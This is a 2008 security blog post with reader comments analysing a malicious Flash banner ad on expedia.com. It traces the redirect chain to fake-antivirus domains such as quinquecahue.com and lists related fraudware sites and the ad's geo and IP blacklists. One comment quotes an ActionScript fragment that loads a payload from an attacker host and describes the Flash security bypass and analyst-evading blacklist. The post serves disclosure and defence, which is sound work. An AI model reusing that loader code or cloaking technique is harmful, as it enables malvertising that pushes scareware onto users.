Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

expedia.com hit by malicious banner advertisement?

January 28th 2008 in Uncategorized

Expedia.com has been infiltrated by a malicious banner advertisement – a new one that I have not seen before.


































Victim site Expedia.com (216.251.114.10)
SWF host media.expedia.com
SWF Source  
Target fraudware domain scanner2.malware-scan.com
Banned cities, countries and IPs 199.3.0.0-199.3.255.255
216.251.0.0-216.251.255.255
172.30.0.0-172.30.25.255 (note: expedia.com’s IP is banned)

IN, IL, UK, AU, FR, IT, CN, JP, DE, ES, MX, AE

colorado, washington, california, massachusetts, ontario, texas, hawaii, missouri, illinois
Permitted cities, countries and IPS  
SWF URL media.expedia.com/ads/FXSound/728×90.swf
Special notes  
Incident reported to expedia.com
Resolution  
 

Let’s have a look at the danger path:















URL Referrer
scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_
ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=
3958_0_1349prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2
&mt_info=4957_3064_2358
prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed
=2&mt_info=5337_4168_2358
blessedads.com/?cmpid=pygmalioni&adid=728quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836
quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836
quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836 quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni
quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni media.expedia.com/ads/FXSound/728×90.swf

So, let’s take a look at this new name, quinquecahue.com.


Not surprisingly, the malicious domain is hosted by, you guessed it, securehost.com (190.15.64.190):
http://www.robtex.com/dns/quinquecahue.com.html


Who else might we find in that IP range…
http://www.robtex.com/cnet/190.15.64.html


Again, no surprise, we see akamahi.net, newbieadguide.com, vozemiliogaranon.com and a name I have not seen before, familyislands.com.


Check out the domains sharing nameservers with quinquecahue.com – I *know* you’re going to recognise many names….


domains sharing nameservers
 
advancedcleaner.com
akamahi.net
antispywaresuite.com
antiviruspcsuite.com
antiworm2008.com
avsystemcare.com
bestsellerantivirus.com
diskretter.com
elmejorantivirus.com
erreurchasseur.com
exterminadordevirus.com
moncontenuassistant.com
schijfbewaker.com
securepccleaner.com
spyguardpro.com
storageprotector.com
systemdoctor.com
thetechnorati.com
toolsicuro.com
vozemiliogaranon.com
winspycontrol.com
yourprivacyguard.com


 subdomains
*.quinquecahue.com
ns1.quinquecahue.com
ns2.quinquecahue.com
ns3.quinquecahue.com
ns4.quinquecahue.com
 


7 comments to...
“expedia.com hit by malicious banner advertisement?”

RBNexploit

This is another run as in November 07, there are few more hosts involved in the triangulation see http://rbnexploit.blogspot.com/2007/11/rbn-pc-hijacking-via-banner-ads-on.html



David Marsden

I got something similar from http://www.genesreunited.co.uk which attemtped to download PerformanceOptimizer.



mike wood

re malicious banner advertisement. I too got hit from GenesReunited.co.uk with PerformanceOptimizer. as a naive computer, do i need to let GR know about it. and how come their security didnt pick it up??



David Marsden

Hi Mike,

I reported this to GR and they tried to fob me off by advising me that my account seemed to be ok and that I should run an anti-virus program. I replied that I didn’t even download the spyware and that I use linux as an operating system, but that plenty of their other users may be at risk and should be aware. I also gave them a link to this site.

GR appears to be down right now…



sandi

Hi guys,

The campaign on genesreunited has been coded to NOT display when the computer being used is in genesreunited’s IP range.

I need a Fiddler capture, Ethereal capture or other network trace – that will give me all the proof I need to get this shut down.

Sandi



Golan

Hi,

Sorry for the off topic question, but how can you tell which are the banned IP’s/Cities/Countries ?

Thanks!



bago

It was a pretty clever attack, where from a neutral country they would contact the ad provider and provide them with highly obfuscated flash. The Flash would then check the campaigns blacklist so that if you were trying to figure out where these rogue ads came from you got a blank flash file. Then it would download gnida.swf, which would then download the slowware that they advertised how to remove. The main problem is that adobe lets you make a function call with an array reference, bypassing CAS.

_root[_url][substr](0, 7) == http:// && this.m1[loadMovie](newbieadguide.com/statsa.php + &u=somenumbers);

Each campaign had its own blacklist and region lockout.

Here was the IP blacklist:

62.193.227.221

62.193.235.245

62.193.235.46

64.233.183.104

66.102.9.104

66.249.91.104

69.46.17.170

72.14.209.104

72.14.235.104

72.14.253.104

209.85.135.104

062.193.227.222

066.232.118.93


rhapsody.com has been hit by a malicious banner advertisement – rhapsody.com is owned by RealNetworks.   Victim site rhapsody.com (207.188.21.32) SWF host RealOne / Doubleclick SWF Source   Target fraudware domain scanner2.malware-scan.com Banned cities, countries and IPs 207.188.0.0-207.188.255.255 (note this IP range captures rhapsody.com)newjersey, newyork, california, washington, […]

Previous Entry

The bad guys are certainly expanding their stable of advertisements.
Both lead victims to malicious quinquecahue.com URLs.  More later… 

 

Next Entry

Archives